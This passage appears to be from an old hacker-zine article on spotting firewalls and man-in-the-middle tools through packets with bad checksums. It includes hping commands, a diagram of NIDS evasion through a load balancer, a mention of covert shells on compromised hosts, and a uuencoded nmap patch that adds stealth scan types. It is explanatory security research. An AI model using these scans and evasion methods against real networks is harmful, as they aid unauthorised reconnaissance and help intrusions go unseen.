+HPING www.redhat.com (rl0 66.187.232.56): udp mode set, 28 headers + 0 data
+ICMP Packet filtered from ip=63.146.1.74 name=UNKNOWN
+
+    Having a way to distinguish packets from the host and the firewall,
+let us use OS identification tools working only with firewall packets
+without mixing host and firewall replys. Try nmap -O.
+
+Interesting ?
+Well I made a quick patch for Nmap-3.1ALPHA4 that add 2 new type of scan:
+ -sZ BadTCP SYN stealth port scan
+ -sV BadUDP port scan
+  
+    Note that -sZ is derived by a bad drawn -sS and -sV by -sU. BadTCP scan
+uses FIN scan engine because the default behavior of a host is not to reply.
+BadUDP scan uses UDP scan engine because the default behavior of a host is
+not to reply.
+
+    I hope that Fyodor will think about a from scratch version of Nmap for
+version 4.00 that could permit to define the real and complete situation of
+host ports:
+
+- closed
+- opened
+- filtered (no reply)
+- firewalled (firewall reply)
+
+The patch is below.
+
+    How does Scanlogd work against this new type scans? Uhm, it still
+thinks that they are valid packets and it doesn't give the configuration
+options to alert for valid or invalid SYN packets.
+
+
+--[ 2 - Come As You Are
+
+    Ok, so packet filters, even the beautiful OpenBSD 3.2 PF, will have to
+calculate the checksum for every packet?  No, to avoid reply spotting they
+could check the checksum only for packets they want to reply. However it should
+be introduced an option to spot broken checksum packets and drop them.
+
+    Some tools that let you alter packets and permit MiM exist, like
+ettercap, and let your host send packets to the right box and after
+logging/altering forward them to the real destination.
+
+How could we spot the banner trick ?
+# echo "SSH-1.99" > /tmp/banner
+# hping -S -c 1 -p 22 -E /tmp/banner -d 9 -b mybox 
+If you receive a SYN+ACK you can start swearing...
+
+    Note that depends on how the MiM attack is developed. For example
+DSniff check TCP checksum because it works in proxed mode, while
+ettercap, that uses a non-proxed method, doesn't. Generally if you don't
+add such a sanity check in your tool you could be discovered.
+
+    Is this check always needed? No, it's needed if you want to alter a
+packet or you want to reply to a received packet. So if your tool simply
+sniff packets without sending/modifying them you're safe.
+
+    Ok, but if I want to safely reply-to/modify packets what is the
+solution? You have 2 solutions:
+
+1) check the checksum for every packet and work only if correct without
+   dropping it in any case; modify/reply-to using a valid checksum.
+2) using Incremental Updating of the Internet Checksum [RFC1141] for
+   packets that needs to be modified; checking the checksum for packets you
+   want to reply 
+
+    Note that incremental updating will keep a checksum broken if it was
+broken and correct if it was correct and it's really faster than
+calculating it from scratch.
+
+    Curiosity: TCP checksum of a source route packets is invalid while it's
+in flight, because it is based on the final destination IP address, which is
+altered as the source route is followed (at the destination, it will be
+correct).
+
+    Most default IDS configurations will alert about bad checksumming traffic
+but never log those packets, so the admin couldn't check the data part and what
+was going on. Generally it's possible to create a covert shell with a bad cksum
+tunnel on a r00t compromised box and connect to it without being detected.
+
+    Another type of problem could born if the code of a NAT-box/load balancer
+calculate che checksum from scratch. In this case we could bypass an IDS if
+it's placed between our box and this dumb device.
+Check this interesting example:
+                
+www.oracle.com:80
+                        
+Evil --[badSYN]--> Router --[badSYN]--> Load_Balancer --[SYN]--> WebServer 
+				|			  |
+			      NIDS1			NIDS2
+
+NIDS1 will see a TCP SYN with invalid checksum while NIDS2, if deployed, will
+see a valid and modifyed SYN. So the webserver will reply to us with a SYN+ACK,
+letting us talk with it while causing a lot of doubts to NIDS1.
+What would you think if you were the security manager and you'll find such
+different results on NIDS1 and NIDS2 ?
+
+    The solution is always Incremental Updating [RFC1141].
+
+
+--[ 3 - You Know You're Right
+
+awgn (31337 H4X0R)
+raptor & nobody (LSD project)
+batmaNAGA & ALORobin (ettercap authors)
+JWK (OpenBSD addicted)
+Daniel Hartmeier (Mr.Infinite Patience; OpenBSD PF main coder) 
+antirez (Hping author)
+Fyodor (Nmap author)
+Ed3f (15b27bed5e11fc0550d7923176dbaf81)
+
+
+--[ 4 - Drain You
+
+[1] Hping	--->	http://www.hping.org
+[2] Nmap	--->	http://www.insecure.org/nmap
+[3] Scanlogd	--->	http://www.openwall.com/scanlogd                        
+[4] OpenBSD	--->	http://www.openbsd.org
+[5] OpenBSD PF	--->	http://www.benzedrine.cx/pf.html
+[6] Ettercap    --->	http://ettercap.sourceforge.net
+[7] DSniff      --->	http://monkey.org/~dugsong/dsniff                       
+[8] RFC1141     --->	http://www.ietf.org/rfc/rfc1141.txt
+
+
+--[ 5 - Big Long Now
+
+begin 600 nmap-fw-detection-patch.diff
+M9&EF9B`M=7).8B!N;6%P+3,N,3!!3%!(030O3FUA<$]P<RYC8R!N;6%P+3,N
+M,3!!3%!(030M8F%D+TYM87!/<',N8V,*+2TM(&YM87`M,RXQ,$%,4$A!-"].
+M;6%P3W!S+F-C"5=E9"!/8W0@,C,@,#@Z-3$Z-3<@,C`P,@HK*RL@;FUA<"TS
+M+C$P04Q02$$T+6)A9"].;6%P3W!S+F-C"51H=2!$96,@,3(@,#<Z-3@Z,C0@
+M,C`P,@I`0"`M,30X+#8@*S$T."PW($!`"B`@(&QI<W1S8V%N(#T@<&EN9W-C
+M86X@/2!A;&QO=V%L;"`](&%C:W-C86X@/2!B;W5N8V5S8V%N(#T@8V]N;F5C
+M='-C86X@/2`P.PH@("!R<&-S8V%N(#T@;G5L;'-C86X@/2!X;6%S<V-A;B`]
+M(&9R86=S8V%N(#T@<WEN<V-A;B`]('=I;F1O=W-C86X@/2`P.PH@("!M86EM
+M;VYS8V%N(#T@:61L97-C86X@/2!F:6YS8V%N(#T@=61P<V-A;B`](&EP<')O
+M='-C86X@/2!N;W)E<V]L=F4@/2`P.PHK("!B861T8W!S8V%N(#T@8F%D=61P
+M<V-A;B`](&)A9&-K<W5M(#T@,#L*("`@9F]R8V4@/2!A<'!E;F1?;W5T<'5T
+M(#T@,#L*("`@8GIE<F\H;&]G9F0L('-I>F5O9BA&24Q%("HI("H@3$]'7U19
+M4$53*3L*("`@;FUA<%]S=&1O=70@/2!S=&1O=70["D!`("TQ-38L,3$@*S$U
+M-RPQ,2!`0`H@?0H@"B!B;V]L($YM87!/<',Z.E1#4%-C86XH*2!["BT@(')E
+M='5R;B!A8VMS8V%N?&)O=6YC97-C86Y\8V]N;F5C='-C86Y\9FEN<V-A;GQI
+M9&QE<V-A;GQM86EM;VYS8V%N?&YU;&QS8V%N?'-Y;G-C86Y\=VEN9&]W<V-A
+M;GQX;6%S<V-A;CL**R`@<F5T=7)N(&%C:W-C86Y\8F]U;F-E<V-A;GQC;VYN
+M96-T<V-A;GQF:6YS8V%N?&ED;&5S8V%N?&UA:6UO;G-C86Y\;G5L;'-C86Y\
+M<WEN<V-A;GQW:6YD;W=S8V%N?'AM87-S8V%N?&)A9'1C<'-C86X["B!]"B`*
+M(&)O;VP@3FUA<$]P<SHZ54104V-A;B@I('L*+2`@<F5T=7)N('5D<'-C86X[
+M"BL@(')E='5R;B!U9'!S8V%N?&)A9'5D<'-C86X["B!]"B`*(`I`0"`M,C$X
+M+#<@*S(Q.2PW($!`"B`@("`@?0H@(V5N9&EF"B`@("`@"BT@("`@:68@*&%C
+M:W-C86Y\9FEN<V-A;GQI9&QE<V-A;GQI<'!R;W1S8V%N?&UA:6UO;G-C86Y\
+M;G5L;'-C86Y\<WEN<V-A;GQU9'!S8V%N?'=I;F1O=W-C86Y\>&UA<W-C86XI
+M('L**R`@("!I9B`H86-K<V-A;GQF:6YS8V%N?&ED;&5S8V%N?&EP<')O='-C
+M86Y\;6%I;6]N<V-A;GQN=6QL<V-A;GQS>6YS8V%N?'5D<'-C86Y\8F%D=61P
+M<V-A;GQW:6YD;W=S8V%N?'AM87-S8V%N?&)A9'1C<'-C86XI('L*("-I9FYD
+M968@5TE.,S(*("`@("`@(&9A=&%L*")9;W4@<F5Q=65S=&5D(&$@<V-A;B!T
+M>7!E('=H:6-H(')E<75I<F5S('(P,'0@<')I=FEL96=E<RP@86YD('EO=2!D
+M;R!N;W0@:&%V92!T:&5M+EQN(BD["B`C96QS90I`0"`M,C4Y+#$U("LR-C`L
+M,34@0$`*("`@:68@*&)O=6YC97-C86X@)B8@<&EN9W1Y<&4@(3T@4$E.1U19
+M4$5?3D].12D@"B`@("`@;&]G7W=R:71E*$Q/1U]35$1/550L(")(:6YT.B!I
+M9B!Y;W5R(&)O=6YC92!S8V%N('1A<F=E="!H;W-T<R!A<F5N)W0@<F5A8VAA
+M8FQE(&9R;VT@:&5R92P@<F5M96UB97(@=&\@=7-E("U0,"!S;R!W92!D;VXG
+M="!T<GD@86YD('!I;F<@=&AE;2!P<FEO<B!T;R!T:&4@<V-A;EQN(BD["B`@
+M(`HM("!I9B`H86-K<V-A;BMB;W5N8V5S8V%N*V-O;FYE8W1S8V%N*V9I;G-C
+M86XK:61L97-C86XK;6%I;6]N<V-A;BMN=6QL<V-A;BMS>6YS8V%N*W=I;F1O
+M=W-C86XK>&UA<W-C86X@/B`Q*0HM("`@(&9A=&%L*")9;W4@<W!E8VEF:65D
+M(&UO<F4@=&AA;B!O;F4@='EP92!O9B!40U`@<V-A;BX@(%!L96%S92!C:&]O
+M<V4@;VYL>2!O;F4@;V8@+7-!+"`M8BP@+7-4+"`M<T8L("US22P@+7--+"`M
+M<TXL("US4RP@+7-7+"!A;F0@+7-8(BD["BL@(&EF("AA8VMS8V%N*V)O=6YC
+M97-C86XK8V]N;F5C='-C86XK9FEN<V-A;BMI9&QE<V-A;BMM86EM;VYS8V%N
+M*VYU;&QS8V%N*W-Y;G-C86XK=VEN9&]W<V-A;BMX;6%S<V-A;BMB861T8W!S
+M8V%N(#X@,2D**R`@("!F871A;"@B66]U('-P96-I9FEE9"!M;W)E('1H86X@
+M;VYE('1Y<&4@;V8@5$-0('-C86XN("!0;&5A<V4@8VAO;W-E(&]N;'D@;VYE
+M(&]F("US02P@+6(L("US5"P@+7-&+"`M<TDL("US32P@+7-.+"`M<U,L("US
+M5RP@+7-8(&%N9"`M<UHB*3L*("`@"B`@(&EF("AN=6UD96-O>7,@/B`P("8F
+M("AB;W5N8V5S8V%N('Q\(&-O;FYE8W1S8V%N*2D@>PH@("`@(&5R<F]R*")7
+M05).24Y'.B!$96-O>7,@87)E(&ER<F5L979A;G0@=&\@=&AE(&)O=6YC92!O
+M<B!C;VYN96-T('-C86YS(BD["B`@('T*("`@"BT@(&EF("AF<F%G<V-A;B`F
+M)B`A*&%C:W-C86Y\9FEN<V-A;GQM86EM;VYS8V%N?&YU;&QS8V%N?'-Y;G-C
+M86Y\=VEN9&]W<V-A;GQX;6%S<V-A;BDI('L*+2`@("!F871A;"@B1G)A9W-C
+M86X@;VYL>2!W;W)K<R!W:71H($%#2RP@1DE.+"!-86EM;VXL($Y53$PL(%-9
+M3BP@5VEN9&]W+"!A;F0@6$U!4R!S8V%N('1Y<&5S(BD["BL@(&EF("AF<F%G
+M<V-A;B`F)B`A*&%C:W-C86Y\9FEN<V-A;GQM86EM;VYS8V%N?&YU;&QS8V%N
+M?'-Y;G-C86Y\=VEN9&]W<V-A;GQX;6%S<V-A;GQB861T8W!S8V%N*2D@>PHK
+M("`@(&9A=&%L*")&<F%G<V-A;B!O;FQY('=O<FMS('=I=&@@04-++"!&24XL
+M($UA:6UO;BP@3E5,3"P@4UE.+"!7:6YD;W<L(%A-05,@86YD($)A9%1#4"!S
+M8V%N('1Y<&5S(BD["B`@('T*("`@"B`@(&EF("AI9&5N='-C86X@)B8@(6-O
+M;FYE8W1S8V%N*2!["D!`("TR.3DL-R`K,S`P+#D@0$`*("`@("!F871A;"@B
+M+2UM:6Y?<&%R86QL96QI<VT@;75S="!B92!L97-S('1H86X@;W(@97%U86P@
+M=&\@+2UM87A?<&%R86QL96QI<VTB*3L*("`@?0H@("`*+2`@:68@*&%F*"D@
+M/3T@049?24Y%5#8@)B8@*&YU;61E8V]Y<WQO<W-C86Y\8F]U;F-E<V-A;GQF
+M<F%G<V-A;GQA8VMS8V%N?&9I;G-C86Y\:61L97-C86Y\:7!P<F]T<V-A;GQM
+M86EM;VYS8V%N?&YU;&QS8V%N?')P8W-C86Y\<WEN<V-A;GQU9'!S8V%N?'=I
+M;F1O=W-C86Y\>&UA<W-C86XI*2!["BL@(&EF("AA9B@I(#T]($%&7TE.150V
+M("8F"BL@"BLH;G5M9&5C;WES?&]S<V-A;GQB;W5N8V5S8V%N?&9R86=S8V%N
+M?&%C:W-C86Y\9FEN<V-A;GQI9&QE<V-A;GQI<'!R;W1S8V%N?&UA:6UO;G-C
+M86Y\;G5L;'-C86Y\<G!C<V-A;GQS>6YS8V%N?'5D<'-C86Y\8F%D=61P<V-A
+M;GQW:6YD;W=S8V%N?'AM87-S8V%N?&)A9'1C<'-C86XI*2!["B`@("`@9F%T
+M86PH(E-O<G)Y("TM($E0=C8@<W5P<&]R="!I<R!C=7)R96YT;'D@;VYL>2!A
+M=F%I;&%B;&4@9F]R(&-O;FYE8W0H*2!S8V%N("@M<U0I+"!P:6YG('-C86X@
+M*"US4"DL(&%N9"!L:7-T('-C86X@*"US3"DN("!)9B!Y;W4@=V%N="!B971T
+M97(@25!V-B!S=7!P;W)T+"!S96YD('EO=7(@<F5Q=65S="!T;R!F>6]D;W)`
+M:6YS96-U<F4N;W)G('-O(&AE(&-A;B!G=6%G92!D96UA;F0N(BD["B`@('T*
+M('T*9&EF9B`M=7).8B!N;6%P+3,N,3!!3%!(030O3FUA<$]P<RYH(&YM87`M
+M,RXQ,$%,4$A!-"UB860O3FUA<$]P<RYH"BTM+2!N;6%P+3,N,3!!3%!(030O
+M3FUA<$]P<RYH"5=E9"!/8W0@,C,@,#@Z-3$Z-3<@,C`P,@HK*RL@;FUA<"TS
+M+C$P04Q02$$T+6)A9"].;6%P3W!S+F@)5&AU($1E8R`Q,B`P-CHU,3HR-"`R
+M,#`R"D!`("TY-"PV("LY-"PW($!`"B`@("\J(%-C86X@=&EM:6YG+W!O;&ET
+M96YE<W,@:7-S=65S("HO"B`@(&EN="!M87A?<&%R86QL96QI<VT[("\O(#`@
+M;65A;G,@:70@:&%S(&YO="!B965N('-E=`H@("!I;G0@;6EN7W!A<F%L;&5L
+M:7-M.R`O+R`P(&UE86YS(&ET(&AA<R!N;W0@8F5E;B!S970**R`@:6YT(&)A
+M9&-K<W5M.PH@("!I;G0@;6%X7W)T=%]T:6UE;W5T.PH@("!I;G0@;6EN7W)T
+M=%]T:6UE;W5T.PH@("!I;G0@:6YI=&EA;%]R='1?=&EM96]U=#L*0$`@+3$S
+M-2PX("LQ,S8L,3`@0$`*("`@:6YT(')P8W-C86X["B`@(&EN="!S>6YS8V%N
+M.PH@("!I;G0@=61P<V-A;CL**R`@:6YT(&)A9'5D<'-C86X["B`@(&EN="!W
+M:6YD;W=S8V%N.PH@("!I;G0@>&UA<W-C86X["BL@(&EN="!B861T8W!S8V%N
+M.PH@("!I;G0@;F]R97-O;'9E.PH@("!I;G0@9F]R8V4[("\J(&9O<F-E(&YM
+M87`@=&\@8V]N=&EN=64@;VX@979E;B!W:&5N('1H92!O=71C;VUE('-E96US
+M('-O;65W:&%T(&-E<G1A:6X@*B\*("`@:6YT(&%P<&5N9%]O=71P=70[("\J
+M($%P<&5N9"!T;R!A;GD@;W5T<'5T(&9I;&5S(')A=&AE<B!T:&%N(&]V97)W
+M<FET92`J+PID:69F("UU<DYB(&YM87`M,RXQ,$%,4$A!-"]G;&]B86Q?<W1R
+M=6-T=7)E<RYH(&YM87`M,RXQ,$%,4$A!-"UB860O9VQO8F%L7W-T<G5C='5R
+M97,N:`HM+2T@;FUA<"TS+C$P04Q02$$T+V=L;V)A;%]S=')U8W1U<F5S+F@)
+M36]N(%-E<"`Q-B`P,SHT-3HU."`R,#`R"BLK*R!N;6%P+3,N,3!!3%!(030M
+M8F%D+V=L;V)A;%]S=')U8W1U<F5S+F@)5&AU($1E8R`Q,B`P-SHP,3HT,R`R
+M,#`R"D!`("TQ.#$L-B`K,3@Q+#8@0$`*('T["B`*(`HM='EP961E9B!E;G5M
+M('L@04-+7U-#04XL(%-93E]30T%.+"!&24Y?4T-!3BP@6$U!4U]30T%.+"!5
+M1%!?4T-!3BP@0T].3D5#5%]30T%.+"!.54Q,7U-#04XL(%=)3D1/5U]30T%.
+M+"!24$-?4T-!3BP@34%)34].7U-#04XL($E04%)/5%]30T%.('T@<W1Y<&4[
+M"BMT>7!E9&5F(&5N=6T@>R!!0TM?4T-!3BP@4UE.7U-#04XL($9)3E]30T%.
+M+"!834%37U-#04XL(%5$4%]30T%.+"!#3TY.14-47U-#04XL($Y53$Q?4T-!
+M3BP@5TE.1$]77U-#04XL(%)00U]30T%.+"!-04E-3TY?4T-!3BP@25!04D]4
+M7U-#04XL($)!1%1#4%]30T%.+"!"04151%!?4T-!3B!]('-T>7!E.PH@"B`C
+M96YD:68@+RI'3$]"04Q?4U1254-455)%4U](("HO"F1I9F8@+75R3F(@;FUA
+M<"TS+C$P04Q02$$T+VYM87`N8V,@;FUA<"TS+C$P04Q02$$T+6)A9"]N;6%P
+M+F-C"BTM+2!N;6%P+3,N,3!!3%!(030O;FUA<"YC8PE-;VX@3F]V(#$Q(#$X
+M.C`S.C4V(#(P,#(**RLK(&YM87`M,RXQ,$%,4$A!-"UB860O;FUA<"YC8PE4
+M:'4@1&5C(#$R(#`Y.C`T.C0Y(#(P,#(*0$`@+34Q,RPW("LU,3,L-R!`0`H@
+M("`@("`@8G)E86L["B`@("`@8V%S92`G<R<Z(`H@("`@("`@:68@*"$J;W!T
+M87)G*2!["BT)9G!R:6YT9BAS=&1E<G(L(")!;B!O<'1I;VX@:7,@<F5Q=6ER
+M960@9F]R("US+"!M;W-T(&-O;6UO;B!A<F4@+7-4("AT8W`@<V-A;BDL("US
+M4R`H4UE.('-C86XI+"`M<T8@*$9)3B!S8V%N*2P@+7-5("A51%`@<V-A;BD@
+M86YD("US4"`H4&EN9R!S8V%N*2(I.PHK"69P<FEN=&8H<W1D97)R+"`B06X@
+M;W!T:6]N(&ES(')E<75I<F5D(&9O<B`M<RP@;6]S="!C;VUM;VX@87)E("US
+M5"`H=&-P('-C86XI+"`M<U,@*%-93B!S8V%N*2P@+7-:("A"86140U`@<V-A
+M;BDL("US1B`H1DE.('-C86XI+"`M<U4@*%5$4"!S8V%N*2P@+7-6("A"8615
+M1%`@<V-A;BD@86YD("US4"`H4&EN9R!S8V%N*2(I.PH@"7!R:6YT=7-A9V4H
+M87)G=ELP72P@+3$I.PH@("`@("`@?0H@("`@("`@<"`](&]P=&%R9SL*0$`@
+M+34S-2PW("LU,S4L.2!`0`H@"6-A<V4@)U4G.B`@"B`)("!O+G5D<'-C86XK
+M*SL*(`D@(&)R96%K.PHK"6-A<V4@)U8G.B`@;RYB861U9'!S8V%N*RL[(&\N
+M8F%D8VMS=6T@/2`Q.R!O+G!I;F=T>7!E(#T@4$E.1U194$5?3D].13L@8G)E
+M86L[(`H@"6-A<V4@)U@G.B`@;RYX;6%S<V-A;BLK.V)R96%K.PHK"6-A<V4@
+M)UHG.B`@;RYB861T8W!S8V%N(#T@,3L@;RYB861C:W-U;2`](#$[(&\N<&EN
+M9W1Y<&4@/2!024Y'5%E015].3TY%.R!B<F5A:SL*(`ED969A=6QT.B`@97)R
+M;W(H(E-C86YT>7!E("5C(&YO="!S=7!P;W)T961<;B(L*G`I.R!P<FEN='5S
+M86=E*&%R9W9;,%TL("TQ*3L@8G)E86L["B`)?0H@"7`K*SL*0$`@+3<Q-BPW
+M("LW,3@L-R!`0`H@("`O*B!"969O<F4@=V4@<F%N9&]M:7IE('1H92!P;W)T
+M<R!S8V%N;F5D+"!L971S(&]U='!U="!T:&5M('1O(&UA8VAI;F4@"B`@("`@
+M('!A<G-E86)L92!O=71P=70@*B\*("`@:68@*&\N=F5R8F]S92D*+2`@("`@
+M;W5T<'5T7W!O<G1S7W1O7VUA8VAI;F5?<&%R<V5A8FQE7V]U='!U="AP;W)T
+M<RP@;RYW:6YD;W=S8V%N?&\N<WEN<V-A;GQO+F-O;FYE8W1S8V%N?&\N9G)A
+M9W-C86Y\;RYF:6YS8V%N?&\N;6%I;6]N<V-A;GQO+F)O=6YC97-C86Y\;RYN
+M=6QL<V-A;GQO+GAM87-S8V%N?&\N86-K<V-A;GQO+FED;&5S8V%N+&\N=61P
+M<V-A;BQO+FEP<')O='-C86XI.PHK("`@("!O=71P=71?<&]R='-?=&]?;6%C
+M:&EN95]P87)S96%B;&5?;W5T<'5T*'!O<G1S+&\N=VEN9&]W<V-A;GQO+G-Y
+M;G-C86Y\;RYC;VYN96-T<V-A;GQO+F9R86=S8V%N?&\N9FEN<V-A;GQO+FUA
+M:6UO;G-C86Y\;RYB;W5N8V5S8V%N?&\N;G5L;'-C86Y\;RYX;6%S<V-A;GQO
+M+F%C:W-C86Y\;RYI9&QE<V-A;GQO+F)A9'1C<'-C86XL;RYU9'!S8V%N?&\N
+M8F%D=61P<V-A;BQO+FEP<')O='-C86XI.PH@"B`@("\J(&UO<F4@9F%K96%R
+M9W8@:G5N:RP@0E17(&UA;&QO8R=I;F<@97AT<F$@<W!A8V4@:6X@87)G=ELP
+M72!D;V5S;B=T('=O<FL@*B\*("`@:68@*'%U87-H87)G=BD@>PI`0"`M.#$U
+M+#<@*S@Q-RPW($!`"B`@("`@("!I9B`H8W5R<F5N=&AS+3YF;&%G<R`F($A/
+M4U1?55`@+RHF)B`A8W5R<F5N=&AS+3YW:65R9%]R97-P;VYS97,J+R`F)@H@
+M"2`@(6\N<&EN9W-C86X@)B8@(6\N;&ES='-C86XI('L*(`D*+0EI9B`H*&-U
+M<G)E;G1H<RT^9FQA9W,@)B!(3U-47U50*2`F)B!O+F%F*"D@/3T@049?24Y%
+M5"`F)B!C=7)R96YT:',M/E-O=7)C95-O8VM!9&1R*$Y53$PL($Y53$PI("$]
+M(#`@)B8@*"!O+G=I;F1O=W-C86X@?'P@;RYS>6YS8V%N('Q\(&\N:61L97-C
+M86X@?'P@;RYF:6YS8V%N('Q\(&\N;6%I;6]N<V-A;B!\?"!O+G5D<'-C86X@
+M?'P@;RYN=6QL<V-A;B!\?"!O+GAM87-S8V%N('Q\(&\N86-K<V-A;B!\?"!O
+M+FEP<')O='-C86X@?'P@;RYO<W-C86XI*2!["BL):68@*"AC=7)R96YT:',M
+M/F9L86=S("8@2$]35%]54"D@)B8@;RYA9B@I(#T]($%&7TE.150@)B8@8W5R
+M<F5N=&AS+3Y3;W5R8V53;V-K061D<BA.54Q,+"!.54Q,*2`A/2`P("8F("@@
+M;RYW:6YD;W=S8V%N('Q\(&\N<WEN<V-A;B!\?"!O+FED;&5S8V%N('Q\(&\N
+M9FEN<V-A;B!\?"!O+FUA:6UO;G-C86X@?'P@;RYU9'!S8V%N('Q\(&\N8F%D
+M=61P<V-A;B!\?"!O+FYU;&QS8V%N('Q\(&\N>&UA<W-C86X@?'P@;RYA8VMS
+M8V%N('Q\(&\N:7!P<F]T<V-A;B!\?"!O+F]S<V-A;B!\?"!O+F)A9'1C<'-C
+M86X@*2D@>PH@"2`@:68@*&\N4V]U<F-E4V]C:T%D9'(H)G-S+"`F<W-L96XI
+M(#T](#`I('L*(`D@("`@8W5R<F5N=&AS+3YS9713;W5R8V53;V-K061D<B@F
+M<W,L('-S;&5N*3L*(`D@('T@96QS92!["2`@"D!`("TX,S,L-R`K.#,U+#<@
+M0$`*(`E]"B`)"B`)+RH@1FEG=7)E(&]U="!W:&%T(&QI;FLM;&%Y97(@9&5V
+M:6-E("AI;G1E<F9A8V4I('1O('5S92`H:64@971H,"P@<'!P,"P@971C*2`J
+M+PHM"6EF("@A*F-U<G)E;G1H<RT^9&5V:6-E("8F(&-U<G)E;G1H<RT^9FQA
+M9W,@)B!(3U-47U50("8F("AO+FYU;&QS8V%N('Q\(&\N>&UA<W-C86X@?'P@
+M;RYA8VMS8V%N('Q\(&\N=61P<V-A;B!\?"!O+FED;&5S8V%N('Q\(&\N9FEN
+M<V-A;B!\?"!O+FUA:6UO;G-C86X@?'P@(&\N<WEN<V-A;B!\?"!O+F]S<V-A
+M;B!\?"!O+G=I;F1O=W-C86X@?'P@;RYI<'!R;W1S8V%N*2`F)B`H:7!A9&1R
+M,F1E=FYA;64H(&-U<G)E;G1H<RT^9&5V:6-E+"!C=7)R96YT:',M/G8T<V]U
+M<F-E:7`H*2D@(3T@,"DI"BL):68@*"$J8W5R<F5N=&AS+3YD979I8V4@)B8@
+M8W5R<F5N=&AS+3YF;&%G<R`F($A/4U1?55`@)B8@*&\N;G5L;'-C86X@?'P@
+M;RYX;6%S<V-A;B!\?"!O+F%C:W-C86X@?'P@;RYU9'!S8V%N('Q\(&\N8F%D
+M=61P<V-A;B!\?"!O+FED;&5S8V%N('Q\(&\N9FEN<V-A;B!\?"!O+FUA:6UO
+M;G-C86X@?'P@(&\N<WEN<V-A;B!\?"!O+F]S<V-A;B!\?"!O+G=I;F1O=W-C
+M86X@?'P@;RYI<'!R;W1S8V%N('Q\(&\N8F%D=&-P<V-A;BD@)B8@*&EP861D
+M<C)D979N86UE*"!C=7)R96YT:',M/F1E=FEC92P@8W5R<F5N=&AS+3YV-'-O
+M=7)C96EP*"DI("$](#`I*0H@"2`@9F%T86PH(D-O=6QD(&YO="!F:6=U<F4@
+M;W5T('=H870@9&5V:6-E('1O('-E;F0@=&AE('!A8VME="!O=70@;VXA("!9
+M;W4@;6EG:'0@<&]S<VEB;'D@=V%N="!T;R!T<GD@+5,@*&)U="!T:&ES(&ES
+M('!R;V)A8FQY(&$@8FEG9V5R('!R;V)L96TI+B`@268@>6]U(&%R92!T<GEI
+M;F<@=&\@<W`P,&8@=&AE('-O=7)C92!O9B!A(%-93B]&24X@<V-A;B!W:71H
+M("U3(#QF86ME:7`^+"!T:&5N('EO=2!M=7-T('5S92`M92!E=&@P("AO<B!O
+M=&AE<B!D979I8V5N86UE*2!T;R!T96QL('5S('=H870@:6YT97)F86-E('1O
+M('5S92Y<;B(I.PH@"2\J(%-E="!U<"!T:&4@9&5C;WD@*B\*(`EO+F1E8V]Y
+M<UMO+F1E8V]Y='5R;ET@/2!C=7)R96YT:',M/G8T<V]U<F-E*"D["D!`("TX
+M-#,L-B`K.#0U+#<@0$`*(`EI9B`H;RYW:6YD;W=S8V%N*2!P;W-?<V-A;BAC
+M=7)R96YT:',L('!O<G1S+3YT8W!?<&]R=',L('!O<G1S+3YT8W!?8V]U;G0L
+M(%=)3D1/5U]30T%.*3L*(`EI9B`H;RYC;VYN96-T<V-A;BD@<&]S7W-C86XH
+M8W5R<F5N=&AS+"!P;W)T<RT^=&-P7W!O<G1S+"!P;W)T<RT^=&-P7V-O=6YT
+M+"!#3TY.14-47U-#04XI.PH@"6EF("AO+F%C:W-C86XI('!O<U]S8V%N*&-U
+M<G)E;G1H<RP@<&]R=',M/G1C<%]P;W)T<RP@<&]R=',M/G1C<%]C;W5N="P@
+M04-+7U-#04XI.R`**PEI9B`H;RYB861T8W!S8V%N*2!S=7!E<E]S8V%N*&-U
+M<G)E;G1H<RP@<&]R=',M/G1C<%]P;W)T<RP@<&]R=',M/G1C<%]C;W5N="P@
+M0D%$5$-07U-#04XI.PH@"6EF("AO+F9I;G-C86XI('-U<&5R7W-C86XH8W5R
+M<F5N=&AS+"!P;W)T<RT^=&-P7W!O<G1S+"!P;W)T<RT^=&-P7V-O=6YT+"!&
+M24Y?4T-!3BD["B`):68@*&\N>&UA<W-C86XI('-U<&5R7W-C86XH8W5R<F5N
+M=&AS+"!P;W)T<RT^=&-P7W!O<G1S+"!P;W)T<RT^=&-P7V-O=6YT+"!834%3
+M7U-#04XI.PH@"6EF("AO+FYU;&QS8V%N*2!S=7!E<E]S8V%N*&-U<G)E;G1H
+M<RP@<&]R=',M/G1C<%]P;W)T<RP@<&]R=',M/G1C<%]C;W5N="P@3E5,3%]3
+M0T%.*3L*0$`@+3@U,"PV("LX-3,L-R!`0`H@"0D)"2`@("`@<&]R=',M/G1C
+M<%]C;W5N="P@34%)34].7U-#04XI.PH@"6EF("AO+G5D<'-C86XI('-U<&5R
+M7W-C86XH8W5R<F5N=&AS+"!P;W)T<RT^=61P7W!O<G1S+"`*(`D)"0D@('!O
+M<G1S+3YU9'!?8V]U;G0L(%5$4%]30T%.*3L**PEI9B`H;RYB861U9'!S8V%N
+M*2!S=7!E<E]S8V%N*&-U<G)E;G1H<RP@<&]R=',M/G5D<%]P;W)T<RP@<&]R
+M=',M/G5D<%]C;W5N="P@0D%$54107U-#04XI.PD)"2`@"B`):68@*&\N:7!P
+M<F]T<V-A;BD@<W5P97)?<V-A;BAC=7)R96YT:',L('!O<G1S+3YP<F]T<RP@
+M"B`)"0D)("`@("!P;W)T<RT^<')O=%]C;W5N="P@25!04D]47U-#04XI.PH@
+M"D!`("TQ,3DX+#@@*S$R,#(L,3`@0$`*(`D@(DYM87`@5BX@)7,@57-A9V4Z
+M(&YM87`@6U-C86X@5'EP92AS*5T@6T]P=&EO;G-=(#QH;W-T(&]R(&YE="!L
+M:7-T/EQN(@H@"2`B4V]M92!#;VUM;VX@4V-A;B!4>7!E<R`H)RHG(&]P=&EO
+M;G,@<F5Q=6ER92!R;V]T('!R:79I;&5G97,I7&XB"B`)("(J("US4R!40U`@
+M4UE.('-T96%L=&@@<&]R="!S8V%N("AD969A=6QT(&EF('!R:79I;&5G960@
+M*')O;W0I*5QN(@HK"2`B*B`M<UH@0F%D5$-0(%-93B!S=&5A;'1H('!O<G0@
+M<V-A;EQN(@H@"2`B("`M<U0@5$-0(&-O;FYE8W0H*2!P;W)T('-C86X@*&1E
+M9F%U;'0@9F]R('5N<')I=FEL96=E9"!U<V5R<RE<;B(*(`D@(BH@+7-5(%5$
+M4"!P;W)T('-C86Y<;B(**PD@(BH@+7-6($)A9%5$4"!P;W)T('-C86Y<;B(*
+M(`D@(B`@+7-0('!I;F<@<V-A;B`H1FEN9"!A;GD@<F5A8VAA8FQE(&UA8VAI
